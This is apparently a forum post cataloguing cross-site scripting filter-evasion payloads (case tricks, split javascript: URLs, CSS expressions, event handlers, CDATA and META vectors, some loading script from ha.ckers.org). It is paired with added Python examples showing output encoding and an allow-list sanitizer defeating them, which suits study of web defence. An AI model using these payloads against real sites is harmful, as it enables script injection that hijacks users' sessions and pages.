Introduction to Cross Site Scripting (XSS) attack techniques

Original poster, posted on 2012-12-31 09:59:28
1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js

    <script src="bad.jpg"></script>
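The three evasions above all target filters that look for one fixed spelling of the tag, or that assume `>` ends a tag and `.js` ends every script URL. The Python script below is an added example, not part of the original post: it runs the post's own payloads from items 1-3 through a simplistic blocklist of the kind those payloads are written against, and then through context-aware HTML output encoding, and reports which of the two actually leaves no tag start behind. The payload list, the baseline `<script>` tag and the two blocklist patterns are constructed for the demo.

```python
import html
import re

# Constructed demo input: the payloads quoted in items 1-3 of the post, plus a
# plain <script> tag as a baseline that any filter is expected to catch.
PAYLOADS = [
    "<script>alert(1)</script>",               # baseline (constructed)
    "<sCript>alert('d')</scRipT>",             # item 1: mixed case
    "<<script>alert('c')//<</script>",         # item 2: extra characters
    '<SCRIPT a=">" SRC="t.js"></SCRIPT>',      # item 2: '>' inside an attribute
    '<script src="bad.jpg"></script>',         # item 3: non-.js extension
]

# A simplistic blocklist of the kind the post's payloads are written against:
# it strips the exact lowercase <script></script> pair and any script tag whose
# src ends in ".js".  Both patterns are constructed for this demo.
_LITERAL_SCRIPT = re.compile(r"<script>|</script>")
_EXTERNAL_JS = re.compile(r'<script[^>]*src="[^"]*\.js"[^>]*>', re.IGNORECASE)


def naive_blocklist(untrusted: str) -> str:
    """Remove what the blocklist recognises and return the rest unchanged."""
    return _EXTERNAL_JS.sub("", _LITERAL_SCRIPT.sub("", untrusted))


def encode_for_html_text(untrusted: str) -> str:
    """Output encoding for the HTML text context: every '<', '>', '&' and quote
    becomes a character reference, so the tokenizer can never open a tag."""
    return html.escape(untrusted, quote=True)


def leaves_tag_start(fragment: str) -> bool:
    """Does the fragment still contain '<' followed by a letter, i.e. something
    the HTML tokenizer would open a tag on?"""
    return re.search(r"<[A-Za-z]", fragment) is not None


def evaluate(payloads=PAYLOADS):
    """For each payload, record whether each defence left a tag start behind."""
    return [
        {
            "payload": p,
            "blocklist_leaves_tag": leaves_tag_start(naive_blocklist(p)),
            "encoding_leaves_tag": leaves_tag_start(encode_for_html_text(p)),
        }
        for p in payloads
    ]


if __name__ == "__main__":
    for row in evaluate():
        print(f"{row['payload']!r:45} blocklist leaks: {row['blocklist_leaves_tag']!s:5} "
              f"encoding leaks: {row['encoding_leaves_tag']}")
```

Only the baseline is caught by the blocklist; every one of the post's variants comes out with a tag start intact, while output encoding neutralises all of them without knowing anything about the variant. That is the general lesson behind items 1-3: encode untrusted data for the context it is written into rather than trying to enumerate bad input.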

4. Put JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {

               background-image: url('javascript:alert("XSS");')

          }

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tab or newline characters to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in HTML tags (event handler attributes)

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in a swf

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>

13. Write a cookie through META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
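Items 4, 6, 9 and 14 all come down to two attribute classes: URL-valued attributes (src, href, url()) that carry a javascript: scheme, possibly broken up with tab or newline characters, and on* event handler attributes. Where untrusted HTML has to be allowed at all, the defence is an allow-list sanitizer that rebuilds the markup from a parse tree rather than pattern-matching the raw string. The script below is an added example, not from the original post, built on the standard library's html.parser: it keeps only listed tags and attributes, drops every on* attribute, and checks URL attributes only after removing ASCII tab/LF/CR and trimming leading control characters, which is what browsers do before reading the scheme, so the item 6 tricks do not get past the scheme check. The tag and attribute allow-list, the safe-scheme set and the sample inputs in the demo are assumptions.

```python
import re
from html import escape
from html.parser import HTMLParser

# Allow-list (an assumption for this demo): tags that may survive, with the
# attributes each may carry.  Everything else is dropped, which covers script,
# style, link, meta, embed, xml, iframe, frameset and any tag invented later.
ALLOWED_TAGS = {
    "p": set(), "b": set(), "i": set(), "br": set(),
    "a": {"href", "title"},
    "img": {"src", "alt"},
}
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style", "xml"}   # discard their text as well
URL_ATTRIBUTES = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}

# Browsers delete ASCII tab, LF and CR anywhere in a URL and trim leading and
# trailing C0 controls and spaces before they read the scheme, so a validator
# has to do the same or "jav<TAB>ascript:" sails past a plain prefix check.
_TAB_LF_CR = re.compile(r"[\t\n\r]")
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def normalize_url(raw: str) -> str:
    return _TAB_LF_CR.sub("", raw).strip(_C0_AND_SPACE)


def is_safe_url(raw: str) -> bool:
    """True for relative references (no scheme) and for allow-listed schemes."""
    m = _SCHEME.match(normalize_url(raw))
    if m is None:
        return True          # no scheme: resolved against the page's own origin
    return m.group(1).lower() in SAFE_SCHEMES


class AllowListSanitizer(HTMLParser):
    """Rebuilds the input from parsed tokens, so case tricks, junk attributes
    and '>' inside attribute values never change the outcome."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []        # (reason, detail) pairs; useful as a detection signal
        self._discarding = None  # name of a DROP_WITH_CONTENT tag we are inside

    def handle_starttag(self, tag, attrs):
        if self._discarding:
            return
        if tag in DROP_WITH_CONTENT:
            self._discarding = tag
        if tag not in ALLOWED_TAGS:
            self.dropped.append(("tag", tag))
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name not in ALLOWED_TAGS[tag]:
                self.dropped.append(("attr", f"{tag}@{name}"))             # item 9
            elif name in URL_ATTRIBUTES and not is_safe_url(value):
                self.dropped.append(("url", f"{tag}@{name}={value!r}"))    # items 6, 14
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self._discarding:
            self._discarding = None
        elif not self._discarding and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._discarding:
            self.out.append(escape(data, quote=False))


def sanitize(untrusted_html: str):
    """Return (clean_html, dropped_items)."""
    p = AllowListSanitizer()
    p.feed(untrusted_html)
    p.close()
    return "".join(p.out), p.dropped


if __name__ == "__main__":
    # Constructed samples modelled on items 6, 9 and 14 of the post.
    for sample in ('<img src="jav\tascr\nipt:alert(\'XSS3\')" alt="x">',
                   "<p onload=\"alert('onload')\">hi</p>",
                   "<IFRAME SRC=javascript:alert('XSS27')></IFRAME><b>ok</b>"):
        print(sanitize(sample))
```

The `dropped` list is worth keeping: a sanitizer that silently fixes input hides the attack, while one that records what it removed gives the application a signal to log and alert on. Note also that the CSS-based vectors (items 4, 7, 8 and the STYLE attributes in item 14) are handled here simply by never allowing a style tag or attribute through at all, rather than by trying to parse CSS.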
